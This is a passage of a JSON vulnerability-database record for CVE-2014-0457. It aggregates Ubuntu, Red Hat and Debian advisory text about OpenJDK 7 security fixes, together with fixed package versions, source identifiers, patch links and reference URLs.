of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 13.10\n- Ubuntu 12.10\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK 7. \n\nSoftware Description:\n- openjdk-7: Open Source Java implementation\n\nDetails:\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. An attacker could\nexploit these to cause a denial of service or expose sensitive data over\nthe network. (CVE-2014-0429, CVE-2014-0446, CVE-2014-0451, CVE-2014-0452,\nCVE-2014-0454, CVE-2014-0455, CVE-2014-0456, CVE-2014-0457, CVE-2014-0458,\nCVE-2014-0461, CVE-2014-2397, CVE-2014-2402, CVE-2014-2412, CVE-2014-2414,\nCVE-2014-2421, CVE-2014-2423, CVE-2014-2427)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure and data integrity. An attacker could exploit these\nto expose sensitive data over the network. (CVE-2014-0453, CVE-2014-0460)\n\nA vulnerability was discovered in the OpenJDK JRE related to availability. \nAn attacker could exploit this to cause a denial of service. \n(CVE-2014-0459)\n\nJakub Wilk discovered that the OpenJDK JRE incorrectly handled temporary\nfiles. In the default installation of Ubuntu, this should be\nprevented by the Yama link restrictions. (CVE-2014-1876)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to data\nintegrity. (CVE-2014-2398, CVE-2014-2413)\n\nA vulnerability was discovered in the OpenJDK JRE related to information\ndisclosure. An attacker could exploit this to expose sensitive data over\nthe network. (CVE-2014-2403)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n icedtea-7-jre-jamvm 7u55-2.4.7-1ubuntu1\n openjdk-7-jre 7u55-2.4.7-1ubuntu1\n openjdk-7-jre-headless 7u55-2.4.7-1ubuntu1\n openjdk-7-jre-lib 7u55-2.4.7-1ubuntu1\n openjdk-7-jre-zero 7u55-2.4.7-1ubuntu1\n\nUbuntu 13.10:\n icedtea-7-jre-jamvm 7u55-2.4.7-1ubuntu1~0.13.10.1\n openjdk-7-jre 7u55-2.4.7-1ubuntu1~0.13.10.1\n openjdk-7-jre-headless 7u55-2.4.7-1ubuntu1~0.13.10.1\n openjdk-7-jre-lib 7u55-2.4.7-1ubuntu1~0.13.10.1\n openjdk-7-jre-zero 7u55-2.4.7-1ubuntu1~0.13.10.1\n\nUbuntu 12.10:\n icedtea-7-jre-cacao 7u55-2.4.7-1ubuntu1~0.12.10.1\n icedtea-7-jre-jamvm 7u55-2.4.7-1ubuntu1~0.12.10.1\n openjdk-7-jre 7u55-2.4.7-1ubuntu1~0.12.10.1\n openjdk-7-jre-headless 7u55-2.4.7-1ubuntu1~0.12.10.1\n openjdk-7-jre-lib 7u55-2.4.7-1ubuntu1~0.12.10.1\n openjdk-7-jre-zero 7u55-2.4.7-1ubuntu1~0.12.10.1\n\nThis update uses a new upstream release, which includes additional bug\nfixes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.7.0-openjdk security update\nAdvisory ID: RHSA-2014:0675-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0675.html\nIssue date: 2014-06-10\nCVE Names: CVE-2014-0429 CVE-2014-0446 CVE-2014-0451 \n CVE-2014-0452 CVE-2014-0453 CVE-2014-0454 \n CVE-2014-0455 CVE-2014-0456 CVE-2014-0457 \n CVE-2014-0458 CVE-2014-0459 CVE-2014-0460 \n CVE-2014-0461 CVE-2014-1876 CVE-2014-2397 \n CVE-2014-2398 CVE-2014-2402 CVE-2014-2403 \n CVE-2014-2412 CVE-2014-2413 CVE-2014-2414 \n CVE-2014-2421 CVE-2014-2423 CVE-2014-2427 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.0-openjdk packages that fix various security issues are\nnow available for Red Hat Enterprise Linux 7. \n\nThe Red Hat Security Response Team has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit. \n\nAn input validation flaw was discovered in the medialib library in the 2D\ncomponent. A specially crafted image could trigger Java Virtual Machine\nmemory corruption when processed. \n(CVE-2014-0429)\n\nMultiple flaws were discovered in the Hotspot and 2D components in OpenJDK. \nAn untrusted Java application or applet could use these flaws to trigger\nJava Virtual Machine memory corruption and possibly bypass Java sandbox\nrestrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)\n\nMultiple improper permission check issues were discovered in the Libraries\ncomponent in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2014-0457,\nCVE-2014-0455, CVE-2014-0461)\n\nMultiple improper permission check issues were discovered in the AWT,\nJAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. \nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2014-2412, CVE-2014-0451,\nCVE-2014-0458, CVE-2014-2423, CVE-2014-0452, CVE-2014-2414, CVE-2014-2402,\nCVE-2014-0446, CVE-2014-2413, CVE-2014-0454, CVE-2014-2427, CVE-2014-0459)\n\nMultiple flaws were identified in the Java Naming and Directory Interface\n(JNDI) DNS client. These flaws could make it easier for a remote attacker\nto perform DNS spoofing attacks. (CVE-2014-0460)\n\nIt was discovered that the JAXP component did not properly prevent access\nto arbitrary files when a SecurityManager was present. This flaw could\ncause a Java application using JAXP to leak sensitive information, or\naffect application availability. (CVE-2014-2403)\n\nIt was discovered that the Security component in OpenJDK could leak some\ntiming information when performing PKCS#1 unpadding. This could possibly\nlead to the disclosure of some information that was meant to be protected\nby encryption. (CVE-2014-0453)\n\nIt was discovered that the fix for CVE-2013-5797 did not properly resolve\ninput sanitization flaws in javadoc. When javadoc documentation was\ngenerated from an untrusted Java source code and hosted on a domain not\ncontrolled by the code author, these issues could make it easier to perform\ncross-site scripting (XSS) attacks. (CVE-2014-2398)\n\nAn insecure temporary file use flaw was found in the way the unpack200\nutility created log files. (CVE-2014-1876)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website. \n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618)\n1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736)\n1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766)\n1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841)\n1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394)\n1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858)\n1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854)\n1087423 - CVE-2014-2397 OpenJDK: classfile parser invalid BootstrapMethods attribute length (Hotspot, 8034926)\n1087424 - CVE-2014-0455 OpenJDK: MethodHandle variable argument lists handling (Libraries, 8029844)\n1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794)\n1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010)\n1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797)\n1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152)\n1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030)\n1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188)\n1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801)\n1087438 - CVE-2014-2402 OpenJDK: Incorrect NIO channel separation (Libraries, 8026716)\n1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740)\n1087440 - CVE-2014-0454 OpenJDK: Prevent SIGNATURE_PRIMITIVE_SET from being modified (Security, 8029745)\n1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163)\n1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731)\n1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282)\n1087444 - CVE-2014-0459 lcms: insufficient ICC profile version validation (OpenJDK 2D, 8031335)\n1087446 - CVE-2014-2413 OpenJDK: method handle call hierachy bypass (Libraries, 8032686)\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.2.el7_0.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.2.el7_0.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.src.rpm\n\nppc64:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm\njava-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm\n\ns390x:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.s390x.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.s390x.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.s390x.rpm\njava-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.s390x.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.2.el7_0.noarch.rpm\n\nppc64:\njava-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm\n\ns390x:\njava-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.s390x.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.s390x.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.s390x.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.s390x.rpm\n\nx86_64:\njava-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.2.el7_0.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0429.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0446.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0451.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0452.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0453.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0454.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0455.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0456.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0457.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0458.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0459.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0460.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0461.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-1876.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2397.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2398.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2402.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2403.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2412.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2413.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2414.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2421.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2423.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2427.html\nhttps://access.redhat.com/security/updates/classification/#critical\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTl12dXlSAg2UNWIIRAmMnAKDBn3yRFrjgZ2r2Pgk1zNaojzDhXACdE8EM\nWC6ur//nCsBvA7rEK0zVQSI=\n=mQDb\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 5 client) - i386, x86_64\n\n3. \n\nFor the oldstable distribution (squeeze), these problems have been fixed\nin version 6b31-1.13.3-1~deb6u1. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 6b31-1.13.3-1~deb7u1. \n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 6b31-1.13.3-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 6b31-1.13.3-1", "sources": [ { "db": "NVD", "id": "CVE-2014-0457" }, { "db": "ZDI", "id": "ZDI-14-105" }, { "db": "BID", "id": "66866" }, { "db": "VULHUB", "id": "VHN-67950" }, { "db": "VULMON", "id": "CVE-2014-0457" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "126201" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "126413" }, { "db": "PACKETSTORM", "id": "127041" }, { "db": "PACKETSTORM", "id": "126181" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126320" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0457", "trust": 3.6 }, { "db": "BID", "id": "66866", "trust": 1.5 }, { "db": "SECUNIA", "id": "58415", "trust": 1.2 }, { "db": "SECUNIA", "id": "59058", "trust": 1.2 }, { "db": "SECUNIA", "id": "58974", "trust": 1.2 }, { "db": "ZDI", "id": "ZDI-14-105", "trust": 1.0 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2058", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-201404-272", "trust": 0.7 }, { "db": "SECUNIA", "id": "58045", "trust": 0.6 }, { "db": "SECUNIA", "id": "57997", "trust": 0.6 }, { "db": "SECUNIA", "id": "57933", "trust": 0.6 }, { "db": "SECUNIA", "id": "57942", "trust": 0.6 }, { "db": "SECUNIA", "id": "57932", "trust": 0.6 }, { "db": "SECUNIA", "id": "57991", "trust": 0.6 }, { "db": "HITACHI", "id": "HS14-009", "trust": 0.3 }, { "db": "VULHUB", "id": "VHN-67950", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2014-0457", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126200", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126201", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127267", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126413", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127041", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126181", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126630", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126320", "trust": 0.1 } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-105" }, { "db": "VULHUB", "id": "VHN-67950" }, { "db": "VULMON", "id": "CVE-2014-0457" }, { "db": "BID", "id": "66866" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "126201" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "126413" }, { "db": "PACKETSTORM", "id": "127041" }, { "db": "PACKETSTORM", "id": "126181" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-272" }, { "db": "NVD", "id": "CVE-2014-0457" } ] }, "id": "VAR-201404-0378", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-67950" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T22:08:28.541000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Oracle has issued an update to correct this vulnerability.", "trust": 0.7, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "title": "jre-7u55-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49312" }, { "title": "jdk-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49316" }, { "title": "jre-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49320" }, { "title": "jdk-7u55-nb-8-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49311" }, { "title": "jdk-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49315" }, { "title": "jre-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49319" }, { "title": "jdk-7u55-nb-8-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49310" }, { "title": "jre-7u55-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49314" }, { "title": "jre-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49318" }, { "title": "jdk-7u55-nb-8-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49309" }, { "title": "jre-7u55-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49313" }, { "title": "jdk-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49317" }, { "title": "Red Hat: CVE-2014-0457", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-0457" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2187-1" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2191-1" }, { "title": "Amazon Linux AMI: ALAS-2014-326", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-326" }, { "title": "Amazon Linux AMI: ALAS-2014-327", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-327" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-105" }, { "db": "VULMON", "id": "CVE-2014-0457" }, { "db": "CNNVD", "id": "CNNVD-201404-272" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0457" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 1.6, "url": "http://rhn.redhat.com/errata/rhsa-2014-0675.html" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2014-0685.html" }, { "trust": 1.3, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.3, "url": "http://www.ubuntu.com/usn/usn-2187-1" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/66866" }, { "trust": 1.2, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672080" }, { "trust": 1.2, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676746" }, { "trust": 1.2, "url": "https://www.ibm.com/support/docview.wss?uid=swg21675973" }, { "trust": 1.2, "url": "http://www.debian.org/security/2014/dsa-2912" }, { "trust": 1.2, "url": "http://security.gentoo.org/glsa/glsa-201502-12.xml" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2014:0413" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 1.2, "url": "http://secunia.com/advisories/58415" }, { "trust": 1.2, "url": "http://secunia.com/advisories/58974" }, { "trust": 1.2, "url": "http://secunia.com/advisories/59058" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-2191-1" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140852974709252\u0026w=2" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0446" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1876" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0429" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2412" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0451" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0457" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2398" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0460" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0453" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0456" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2414" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2403" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2397" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0458" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0459" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0452" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0461" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57932" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57933" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57942" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57991" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57997" }, { "trust": 0.6, "url": "http://secunia.com/advisories/58045" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2413" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.5, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0455" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0454" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2402" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.5, "url": 